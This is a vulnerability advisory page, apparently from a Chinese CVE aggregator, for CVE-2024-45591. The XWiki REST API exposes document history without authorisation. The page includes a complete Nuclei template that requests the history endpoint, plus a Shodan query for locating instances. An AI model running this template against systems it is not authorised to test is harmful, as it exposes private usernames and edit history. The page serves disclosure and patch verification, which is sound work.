CVE-2024-45591: XWiki Platform - Unauthorized Document History Access

日期: 2025-08-01 | 影响软件: XWiki Platform | POC: 已公开

漏洞描述

A vulnerability in XWiki Platform's REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.

PoC代码[已公开]

id: CVE-2024-45591

info:
  name: XWiki Platform - Unauthorized Document History Access
  author: pd-bot
  severity: medium
  description: |
    A vulnerability in XWiki Platform's REST API allows unauthorized users to access document history information. The REST API endpoint exposes the history of any page including modification times, version numbers, author details (username and display name), and version comments, regardless of access rights configuration, even on private wikis.
  impact: |
    An attacker can access document history of any known page
  remediation: |
    Upgrade to XWiki Platform version 15.10.9 or 16.3.0-rc-1 or later. No workarounds are available for earlier versions
  reference:
    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-pvmm-55r5-g3mm
    - https://jira.xwiki.org/browse/XWIKI-22052
    - https://nvd.nist.gov/vuln/detail/cve-2024-45591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-45591
    cwe-id: CWE-359,CWE-862
    epss-score: 0.48835
    epss-percentile: 0.97698
    cpe: cpe:2.3:a:xwiki:platform:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: xwiki
    product: xwiki-platform
    shodan-query: http.html:"data-xwiki-reference"
  tags: cve,cve2024,xwiki,exposure,rest-api

http:
  - method: GET
    path:
      - "{{BaseURL}}/xwiki/rest/wikis/xwiki/spaces/Main/pages/WebHome/history"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'version'
          - 'historySummary'
          - 'pageId'
          - 'comment'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022006d75fa5a86c6bc6cccff4dfb57cb09ed19c6f8caf826b010bdeb29f9dc2a9a20220312315bf61a4fd63b70b03956ce94c93ba1e63e3348f45ca80397701fee31663:922c64590222798bb761d5b6d8e72950

相关漏洞推荐